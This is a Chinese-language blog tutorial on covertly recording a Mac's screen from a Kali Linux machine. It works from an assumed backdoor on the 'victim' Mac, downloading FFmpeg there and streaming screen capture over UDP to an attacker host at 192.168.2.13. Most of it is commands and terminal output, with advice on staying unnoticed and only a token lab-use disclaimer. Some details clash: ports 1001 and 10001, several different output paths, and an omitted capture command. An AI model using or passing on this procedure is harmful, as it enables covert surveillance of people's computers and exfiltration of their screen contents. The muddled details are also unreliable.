標籤:

如何使用Kali linux來監控一台Mac系統的電腦

08-10
如何使用Kali linux來監控一台Mac系統的電腦

來自專欄 Night14 人贊了文章

本文是將真實案例分析成為一個理論進行來寫,內容步驟均一樣,希望更多喜歡黑客的小夥伴可以參照文本進行測試一次。

可以用靶機,可以用虛擬機,禁止在未經授權的計算機上進行任何商業實驗。

MAC的成長周期不比微軟長,所以很多低許可權可以監視電腦的全部過程。

開始前的裝備:

1.電腦兩台。

2.系統分別是Kali linux集成系統/ MAC系統

準備工具:

蘋果公司旗下的程序:屏幕共享 【工具會安置在書友會】大家也可以自由去蘋果商店尋找。

開源計算機程序:FFmpeg 百度百科

開始:

第一步:我們首先要在Kali 中安裝開源計算機程序 FFmpeg,

安裝命令:apt-get install ffmpeg 終端複製如下:

apt-get install ffmpegReading package lists... DoneBuilding dependency treeReading state information... DoneSuggested packages:ffmpeg-docThe following packages will be upgraded:ffmpeg1 upgraded, 0 newly installed, 0 to remove and 596 not upgraded.Need to get 1,622 kB of archives.After this operation, 0 B of additional disk space will be used.Get:1 [http://archive-3.kali.org/kali ] kali-rolling/main amd64 ffmpeg amd64 7:3.4.2-2+b1 1,622 kBFetched 1,622 kB in 3s (540.9 kB/s)Reading changelogs... Done(Reading database ... 312014 files and directories currently installed.)Preparing to unpack .../ffmpeg_7%3a3.4.2-2+b1_amd64.deb ...Unpacking ffmpeg (7:3.4.2-2+b1) over (7:3.4.2-1+b1) ...Setting up ffmpeg (7:3.4.2-2+b1) ...Processing triggers for man-db (2.8.2-1) ...

第二步:安裝以後進行配置FFmpeg

要想在Kali linux中看到被攻擊者的桌面分享,FFmpeg需要在受害者電腦上進行配置。

啟動命令:ffmpeg -i udp://0.0.0.0:10001 /NT/night.avi

命令內容:讓FFmprg打開udp埠,(udp://)1001並接受每個可用介面(0.0.0.0)上的輸入(-i),然後使用文件名night.avi講視頻保存在NT目錄里。埠是 10001 。

第三步:在受害者mac上安裝並配置FFmpeg

我們需要MAC系統中安裝FFmpeg, 【超級鏈接 超級鏈接內容:如何在MAC系統上安裝後門詳解與教程】(百度也有相關的後門安裝文章可以借鑒)

假設:我們已經安裝了後門在Mac系統中m,為了更好的隱藏自己不被發現那麼我們需要用到一個最低級 許可權,這樣可以讓受害者無視這個許可權可以造成的後果。

操作命令如下:

curl https://ffmpeg.zeranoe.com/builds/macos64/static/ffmpeg-4.0-macos64-static.zip -o /tmp/ffmpeg.zip

下載完成後,使用unzip /tmp/ffmpeg.zip提取文件。

unzip /tmp/ffmpeg.zipArchive: ffmpeg.zipcreating: ffmpeg-4.0-macos64-static/creating: ffmpeg-4.0-macos64-static/bin/inflating: ffmpeg-4.0-macos64-static/bin/ffmpeginflating: ffmpeg-4.0-macos64-static/bin/ffplayinflating: ffmpeg-4.0-macos64-static/bin/ffprobecreating: ffmpeg-4.0-macos64-static/doc/inflating: ffmpeg-4.0-macos64-static/doc/bootstrap.min.cssinflating: ffmpeg-4.0-macos64-static/doc/default.cssinflating: ffmpeg-4.0-macos64-static/doc/developer.htmlinflating: ffmpeg-4.0-macos64-static/doc/faq.htmlinflating: ffmpeg-4.0-macos64-static/doc/fate.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-all.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-bitstream-filters.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-codecs.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-devices.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-filters.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-formats.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-protocols.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-resampler.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-scaler.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-utils.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffmpeg.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffplay-all.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffplay.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffprobe-all.htmlinflating: ffmpeg-4.0-macos64-static/doc/ffprobe.htmlinflating: ffmpeg-4.0-macos64-static/doc/general.htmlinflating: ffmpeg-4.0-macos64-static/doc/git-howto.htmlinflating: ffmpeg-4.0-macos64-static/doc/libavcodec.htmlinflating: ffmpeg-4.0-macos64-static/doc/libavdevice.htmlinflating: ffmpeg-4.0-macos64-static/doc/libavfilter.htmlinflating: ffmpeg-4.0-macos64-static/doc/libavformat.htmlinflating: ffmpeg-4.0-macos64-static/doc/libavutil.htmlinflating: ffmpeg-4.0-macos64-static/doc/libswresample.htmlinflating: ffmpeg-4.0-macos64-static/doc/libswscale.htmlinflating: ffmpeg-4.0-macos64-static/doc/mailing-list-faq.htmlinflating: ffmpeg-4.0-macos64-static/doc/nut.htmlinflating: ffmpeg-4.0-macos64-static/doc/platform.htmlinflating: ffmpeg-4.0-macos64-static/doc/style.min.cssinflating: ffmpeg-4.0-macos64-static/LICENSE.txtcreating: ffmpeg-4.0-macos64-static/presets/inflating: ffmpeg-4.0-macos64-static/presets/ffprobe.xsdinflating: ffmpeg-4.0-macos64-static/presets/libvpx-1080p.ffpresetinflating: ffmpeg-4.0-macos64-static/presets/libvpx-1080p50_60.ffpresetinflating: ffmpeg-4.0-macos64-static/presets/libvpx-360p.ffpresetinflating: ffmpeg-4.0-macos64-static/presets/libvpx-720p.ffpresetinflating: ffmpeg-4.0-macos64-static/presets/libvpx-720p50_60.ffpresetinflating: ffmpeg-4.0-macos64-static/README.txt

這將創建一個名為「ffmpeg-4.0-macos64-static /」的新目錄,其中包含一個包含ffmpeg二進位文件的bin /目錄。接下來,cd進入該bin /目錄。

cd ffmpeg-4.0-macos64-static/bin/

現在,確保ffmpeg二進位文件可以真正執行chmod命令。

chmod 777 ffmpeg

然後,使用./ffmpeg -f avfoundation -list_devices tr在Mac上列出可用的輸入設備,如下所示。

./ffmpeg -f avfoundation -list_devices true -i ""AVFoundation input device @ 0x7fda1bc152c0 AVFoundation video devices:AVFoundation input device @ 0x7fda1bc152c0 0 FaceTime HD Camera (Built-in)AVFoundation input device @ 0x7fda1bc152c0 1 Capture screen 0AVFoundation input device @ 0x7fda1bc152c0 AVFoundation audio devices:AVFoundation input device @ 0x7fda1bc152c0 0 USB Audio CODECAVFoundation input device @ 0x7fda1bc152c0 1 Built-in Microphone

此命令強制(-f)FFmpeg使用AVFoundation格式和列表(-list_devices)所有可用輸入(-i「」)設備。AVFoundation使用慣例「視頻:音頻」,因此使用「捕捉屏幕」(整個顯示屏幕)捕捉視頻在下一個命令中顯示為「 1: 」(或僅為「1」),因為捕捉屏幕分配給「1」視頻設備。

要以視頻格式捕捉整個Mac顯示屏,請在Mac上的Netcat shell中運行以下命令。

[avfoundation @ 0x7fb5fc004800] Selected pixel format (yuv420p) is not supported by the input device.[avfoundation @ 0x7fb5fc004800] Supported pixel formats:[avfoundation @ 0x7fb5fc004800] uyvy422[avfoundation @ 0x7fb5fc004800] yuyv422[avfoundation @ 0x7fb5fc004800] nv12[avfoundation @ 0x7fb5fc004800] 0rgb[avfoundation @ 0x7fb5fc004800] bgr0[avfoundation @ 0x7fb5fc004800] Overriding selected pixel format to use uyvy422 instead.[avfoundation @ 0x7fb5fc004800] Stream #0: not enough frames to estimate rate; consider increasing probesizeInput #0, avfoundation, from 1: Duration: N/A, start: 24679.553333, bitrate: N/A Stream #0:0: Video: rawvideo (UYVY / 0x59565955), uyvy422, 1440x900, 1000k tbr, 1000k tbn, 1000k tbcStream mapping: Stream #0:0 -> #0:0 (rawvideo (native) -> mpeg4 (native))Press [q] to stop, [?] for help[avi @ 0x7fb5fc082a00] Frame rate very high for a muxer not efficiently supporting it.Please consider specifying a lower framerate, a different muxer or -vsync 2Output #0, avi, to udp://192.168.2.13:10001: Metadata: ISFT : Lavf58.12.100 Stream #0:0: Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1440x900, q=2-31, 200 kb/s, 65535 fps, 600 tbn, 65535 tbc Metadata: encoder : Lavc58.18.100 mpeg4 Side data: cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1frame= 154 fps= 18 q=31.0 size= 1044kB time=00:00:08.60 bitrate= 994.1kbqts/s speed=1.01xframe= 1042 fps= 17 q=31.0 Lsize= 7487kB time=00:01:02.43 bitrate= 982.3kbits/s speed=0.999xvideo:7193kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 4.089208%

回到攻擊者的伺服器上,FFmpeg終端也將顯示視頻流數據,並開始將輸出保存到指定的(/ tmp)目錄。只要FFmpeg終端在兩台機器上運行,Mac就會繼續發送視頻並將其保存到攻擊者的伺服器。

Input #0, avi, from udp://0.0.0.0:10001: Metadata: encoder : Lavf58.12.100 Duration: 497:06:09.71, start: 0.000000, bitrate: N/A Stream #0:0: Video: mpeg4 (Simple Profile) (FMP4 / 0x34504D46), yuv420p, 1440x900 [SAR 1:1 DAR 8:5], 600 fps, 30 tbr, 600 tbn, 65535 tbcStream mapping: Stream #0:0 -> #0:0 (mpeg4 (native) -> mpeg4 (native))Press [q] to stop, [?] for helpOutput #0, avi, to /tmp/outputFile.avi: Metadata: ISFT : Lavf57.83.100 Stream #0:0: Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1440x900 [SAR 1:1 DAR 8:5], q=2-31, 200 kb/s, 30 fps, 30 tbn, 30 tbc Metadata: encoder : Lavc57.107.100 mpeg4 Side data: cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1[mpeg4 @ 0x5610900ed100] Error at MB: 3600[mpeg4 @ 0x5610900ed100] slice end not reached but screenspace end (11780 left 700303, score= -63)[mpeg4 @ 0x5610900ed100] concealing 1618 DC, 1618 AC, 1618 MV errors in I frameframe= 211 fps= 13 q=31.0 size= 1286kB time=00:00:19.83 bitrate= 531.0kbits/s speed=1.19x

第四步: 想要在終端預覽各種/播放各種格式文件,我們需要安裝MPV。

當受害者的視頻發送到攻擊者伺服器中都是時候我們需要打開視頻進行預覽,MPV是一個給予終端的應用程序。可以從命令行播放各種文件格式。Kali linux 安裝命令如下:

apt-get install mpvReading package lists... DoneBuilding dependency treeReading state information... DoneThe following NEW packages will be installed:mpv0 upgraded, 1 newly installed, 0 to remove and 596 not upgraded.Need to get 0 B/933 kB of archives.After this operation, 2,293 kB of additional disk space will be used.Selecting previously unselected package mpv.(Reading database ... 311978 files and directories currently installed.)Preparing to unpack .../mpv_0.27.2-1_amd64.deb ...Unpacking mpv (0.27.2-1) ...Setting up mpv (0.27.2-1) ...

然後可以通過MPV打開方式進行預覽視頻:

mpv --keep-open=yes /tmp/lovr.avi

第五步:最後一步其實就是第一步,我們需要提前去掌握的資料 。FFmpeg的基礎使用方式。

Night 將會努力打造 一千人技術分享,學習社區,打破現有的學習捆綁式教育方法。疑問將會公開知識星球解答, 也是Night官方唯一社區資源分享交流圈子。可以通過官微尋找加入方式。

案例執行人站務組 :軍火庫VS幸運女神兒

禁止使用與任何商業經濟犯罪。

86Night 官微 hackr 1996


推薦閱讀:

macOS High Sierra10.13.6中文官方版
如何評價Craig Federighi成為蘋果軟體副總裁後的軟體質量?
從Mac OS到Mac OS X:從內到外的煥然一新,意義深遠的跨越
CTeX 2.4.14:macOS 字體配置升級
快速上手 macOS

TAG:macOS | 黑客Hacker | 網路攻擊 |